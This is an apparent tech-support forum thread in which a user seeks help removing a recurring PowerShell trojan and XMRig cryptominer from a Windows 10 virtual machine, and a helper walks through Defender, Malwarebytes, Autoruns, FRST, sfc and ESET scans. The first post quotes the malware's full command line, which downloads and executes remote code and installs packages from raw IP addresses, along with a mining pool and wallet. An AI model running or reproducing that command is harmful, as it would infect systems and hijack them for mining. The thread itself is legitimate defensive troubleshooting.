Jump to content

Trojan:PowerShell/PsInjection.A | Threat Severe


Recommended Posts

Help,

My machine is CPU Xeon X5650 

Hyper-V Proxmox - VM Windows 10 Pro with Multi User RDP

For 5 months I have been trying to eliminate this script that runs daily.
Antivirus blocks the virus after it is downloaded and installed on my server, but fails to see the malicious script

 

Affected items from Windows Defender:

CmdLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://rawcdn.githack.com/28308/256/388472586c8aed167752f6174e7de42660b68551/Sqlexec/pe.jpg');Invoke-ReflectivePEInjection -PEUrl http://rawcdn.githack.com/28308/256/388472586c8aed167752f6174e7de42660b68551/Sqlexec/1505132.jpg -ExeArgs '"Cmd /c for /d %i in (123.29.68.36:10307 110.14.184.43:12424 59.120.154.13:11605) do Msiexec /i http://%i/58132A68.moe /Q"' -ForceA

 

Process 100% - MSASC.exe

XMRig/2.14.1 MSVC/2017

"url": "pool.supportxmr.com:3333",

 "user": "48DdDKqJikPNZqUxdZNUnoeNReQofUtVCUG1PBoxsKWfKDBbPgcXDjBdPsxs4xpZmhL7k1UehNuqoY8Fdbi1oZYs1yp3UWQ",
 "pass": "x",

 

 

Link to post
Share on other sites

  • Replies 52
  • Created
  • Last Reply

Top Posters In This Topic

Hi.

Is it possible for you to go to the TEMP sub-folder mentioned below & to manually delete the EXE file   named ST.exe

c:/windows/temp/st.exe

Let's have you try that.

If no luck, since it looks like you are able to use the Windows Settings menu (s )  I can guide you to doing a FULL scan with Windows Defender.

 

See the MS Security Intelligence description of this trojan.

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Ceprolad.A

Link to post
Share on other sites

Doing a Full scan with Windows Defender is a good idea.  I will go ahead & list how to do that  ( just in case).

You know how to navigate to the Virus & Threat protection section.

Once you get there, note the "Scan Options" in blue.   Just need you to drill down into that to get to the option for FULL scan.

image.png.ef373aa406a6d2e98f0b125daff2b0e6.png

Click Scan options.

image.thumb.png.52961c57498aac823400dc1e38e15c6e.png

 

Then click on Full scan.   Have lots of patience.   Keep me advised on the result.    We can do more later.

 

Edited by Maurice Naggar
Link to post
Share on other sites

OK.   That is likely to take a long time.  Let it run for however it takes.  Patience is key.

Let me know if this Windows uses the standard Command shell or if it uses Powershell.   Later on, I can guide you to emptying that TEMP sub-folder & other temp areas.

Along with getting a couple of reports.   Though first, we want to see the result of this Full scan.

Cheers.

Link to post
Share on other sites

Look at each, one at a time.   Click the "see details"  & look if there is a Action option

We want it to remove ( delete) each item it tagged.

Look and take action & keep me advised.

and

when all that is done, let us see if we can find its run log.

You should first set Windows Explorer to show all folders  ( including hidden & system folders)

Windows File Explorer needs to be  set to show ALL  folders, all system files,  etc  including hidden files / folders

Open Windows File Explorer.

  • Select View   from its top menu bar  >   click Options  on the icon at the far right-side > Change folder and search options   ( from the drop down ).
  • on the next multi-tab mini-window
  • Select the View tab and, in Advanced settings,
  • select Show hidden files, folders, and drives 
  • and OK.

 

Then, find the log mpcmdrun.log and attach it with your reply

C:\Users\<user>\AppData\Local\Temp\MpCmdRun.log

where <user> is your windows account login    ( substitute without the brackets)

 

Link to post
Share on other sites

Sorry, my bad.

 


-------------------------------------------------------------------------------------
MpCmdRun: Command Line: "C:\Windows\WinSxS\amd64_windows-defender-service_31bf3856ad364e35_10.0.18362.1_none_980392c9d40502d2\MpCmdRun.exe" 
 Start Time: ‎Fri ‎Apr ‎10 ‎2020 01:50:10

MpEnsureProcessMitigationPolicy: hr = 0x1
MpCmdRun: End Time: ‎Fri ‎Apr ‎10 ‎2020 01:50:10
-------------------------------------------------------------------------------------

Screenshot (13).png

Link to post
Share on other sites

Malwarebytes
www.malwarebytes.com

-Log Details-
Scan Date: 4/10/20
Scan Time: 2:32 AM
Log File: 5764fd66-7aba-11ea-9b2f-6638cbb01674.json

-Software Information-
Version: 4.1.0.56
Components Version: 1.0.867
Update Package Version: 1.0.22202
License: Premium

-System Information-
OS: Windows 10 (Build 18362.752)
CPU: x64
File System: NTFS
User: \

-Scan Summary-
Scan Type: Threat Scan
Scan Initiated By: Manual
Result: Completed
Objects Scanned: 1119570
Threats Detected: 1
Threats Quarantined: 1
Time Elapsed: 3 min, 43 sec

-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Detect
PUM: Detect

-Scan Details-
Process: 0
(No malicious items detected)

Module: 0
(No malicious items detected)

Registry Key: 0
(No malicious items detected)

Registry Value: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Data Stream: 0
(No malicious items detected)

Folder: 0
(No malicious items detected)

File: 1
Generic.Malware/Suspicious, C:\USERS\PITSOFT\DOWNLOADS\RDPWRAP-V1.6.2.ZIP, Quarantined, 0, 392686, 1.0.22202, , shuriken, 

Physical Sector: 0
(No malicious items detected)

WMI: 0
(No malicious items detected)


(end)

Link to post
Share on other sites

OK.  Malwarebytes tagged & removed 1 zip file.   As we go forward, please just attach the report / log file(s).

  • To  ( upload)  a report or file     please click the link as shown below. Then browse to where your file is located and select it and click the Open button.
  • You may as needed, attach more than 1 file.   Just do the "Choose files" drill for each.

_mb_attach.jpg

 

Let's do the following 2 report runs, please.

[   1   ]

Let’s  please try to get and run a special  report  tool from Microsoft. 

It does not make changes. It will be just a report.

 

  • Please download Sysinternals Autoruns from here and save it to your desktop.
  • Note: you also need to do the following:
  • Right-click on Autoruns.exe and select Properties
  • Click on the Compatibility tab
  • Under Privilege Level check the box next to Run this program as an administrator
  • Click on Apply then click OK


Double-click Autoruns.exe to run it.
Once it starts, please press the Esc key on your keyboard.
Now that scanning is stopped, click on the Options button at the top of the program and select Filter Options...

In the Autoruns Filter Options dialogue, verify that the following are unchecked, if they are checked, uncheck them:

  • hide empty locations
  • Hide Microsoft entries
  • Hide Windows entries


Verify that the following is checked, if it is unchecked, check it:

  • Verify code signatures


Once that's done press the F5 key on your keyboard, this will start the scan again, this time let it finish.
When it's finished and says Ready. on the lower left of the program window, please click on the File button at the top of the program and select Save and save the Autoruns.arn file to your desktop and close Autoruns.


Right click on the Autoruns.arn file on your desktop and hover your mouse over Send To and select Compressed (zipped) Folder
Attach the Autoruns.zip folder you just created to your next reply

 

[    2    ]

I would like to have you run a report tool known as FRST. This has no personal information. It is a well-known & widely used & safe.
FRST will help provide me with a list of installed programs and other information about your computer that will help me see if there are any other problems that are not being detected. Please follow the steps below to run FRST.


1: Please download FRST from the link below and save it to your desktop:

"Download link for 64-Bit Version Windows"


Please wait and look toward the top or bottom of your browser for the option to Run or Save.
Click Save to save the file to the Downloads folder

Run report with FRST64

Right-click on FRST64 icon and select Run as Administrator to start the tool , and reply YES to allow it to proceed and run.

Windows 10 users will be prompted about Windows *SmartScreen protection* - click line More info information on that screen and click button Run anyway on next screen.

 

Click YES when prompted by Windows U A C prompt to allow it to run.
Note: If you are prompted by Windows SmartScreen, click More info & followup & choose Run anyway.


Approve the Windows UAC prompt on Windows Vista and newer operating systems by clicking on Continue or Yes. 

Click Yes when the* disclaimer* appears in FRST.
The tool may want to update itself - in that case you'll be prompted when the update is completed and ready to use.

Make sure that Addition options is *checked* - the configuration should look exactly like on the screen below (do not mark additional things unless asked).
Press Scan button and wait.

 

image.png.056ff6bfb8b5e9dfe3d10d2c61a55a88.png


The tool will produce 2  logfiles on your desktop: FRST.txt , Addition.txt 
Click OK button when it shows up. Close the Notepad windows when they show on screen. The tool saves the files.

Please attach these 2 files to your next reply.

 

Thank you.

 

Link to post
Share on other sites

Thank you for the reports.

We need to make an adjustment on Malwarebytes so that Windows Defender is set to be the resident active antivirus.

 See to it that Malwarebytes for Windows is not registered with the Windows 10  Windows Security Center.
Start Malwarebytes. Click Settings ( gear ) icon. Next, lets make real sure that Malwarebytes does NOT register with WindowsSecurityCenter Click theSecurity Tab. Scroll d.own to
"Windows Security Center"
Click the selection to the left  for the line "Always register Malwarebytes in the Windows Security Center".
When done, close the window.
Then I suggested Restart-ing Windows.

 

[    2   ]

This next step is a custom script to do a quick scan with Windows Defender & to attempt to collect the recent results, and to run System File Checker & DISM.

Please Close and Save any open work you may have open.
Please close as many un-needed app-windows that you yourself may have open at this point.   So you can have a clear field of view.

This custom script is for  AlinTech    only / for this machine only.

Close and save any open work files before starting this procedure.

Please Close and save any open work files before you start this next step.  It may involve a Windows Restart at the end of it.
I am sending a   custom Fix script which is going to be used by the FRSTENGLISH tool. They will both work together as a pair.

Please RIGHT-click the (attached file named) FIXLIST and select SAVE  link AS and save it directly ( as is) to the  Downloads  folder

The tool named FRSTENGLISH.exe   tool    is already on the Downloads folder
Start the Windows Explorer and then, to the Downloads folder.


RIGHT click on  FRSTENGLISH    and select RUN as Administrator and allow it to proceed.  Reply YES when prompted to allow to run.
  to run the tool. If the tool warns you the version is outdated, please download and run the updated version.
IF Windows prompts you about running this, select YES to allow it to proceed.

IF you get a block message from Windows about this tool......
click line More info information on that screen
and click button Run anyway on next screen.

on the FRST window:
Click the Fix button just once, and wait.


 
PLEASE have lots and lots of patience when this starts. You will see a green progress bar start. Lots of patience. This run here should be fairly quick.
If you receive a message that a reboot is required, please make sure you allow it to restart normally.
The tool will complete its run after restart.
When finished, the tool will make a log ( Fixlog.txt) in the same location from where it was run.
Please attach the FIXLOG.txt with your next reply later, at your next opportunity   

 

Fixlist.txt

Link to post
Share on other sites

Thanks for the Fixlog.  The DISM tool indicates that the Windows  integrity state is good.

The System File Checker for some reason did not run.   Let's do what follows to run it manually.

Look on the keyboard, press & hold the Windows-icon-logo key & then tap the R key to bring up the RUN option box-window.

Then type in the following

cmd.exe

Look for the flyout list in the window, and click on Run as Administrator

This should bring up an Elevated ( Administrator)  Command window

Type in

sfc /scannow

then tap Enter-key.   Let me know what the bottom line result is.

.

NEXT

I would suggest a free scan with the ESET Online Scanner
Go to https://www.eset.com/us/home/online-scanner/

Look on the right side of the page.  Click Scan Now
It will start a download of "esetonlinescanner_enu.exe"
Save the file to your system, such as the Downloads folder, or else to the Desktop.

Go to the saved file, and double click it to get it started.
When presented with the initial ESET options, click on "Computer Scan".

Next, when prompted by Windows, allow it to start by clicking Yes

When prompted for scan type, Click on Full scan
Look at & tick  ( select )   the radio selection "Enable ESET to detect and quarantine potentially unwanted applications"   and click on Start scan button.

Have patience.  The entire process may take an hour or more. There is an initial update download.
There is a progress window display.
You should ignore all prompts to get the ESET antivirus software program.   ( e.g.  their standard program).   You do not need to buy or get or install anything else.

When the scan is completed, if something was found, it will show a screen with the number of detected items.  If so, click the button marked “View detected results”.

Click The blue “Save scan log” to save the log.

If something was removed and you know it is a false finding, you may click on the blue ”Restore cleaned files”  ( in blue, at bottom).

Press Continue when all done.  You should click to off the offer for “periodic scanning”.

 

Link to post
Share on other sites

Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>sfc /scannow

Beginning system scan.  This process will take some time.

Beginning verification phase of system scan.
Verification 100% complete.

Windows Resource Protection did not find any integrity violations.

C:\WINDOWS\system32>

 

Now, i start the full scan with eset online

Thx

 

Link to post
Share on other sites

Guest
This topic is now closed to further replies.
 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.

Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.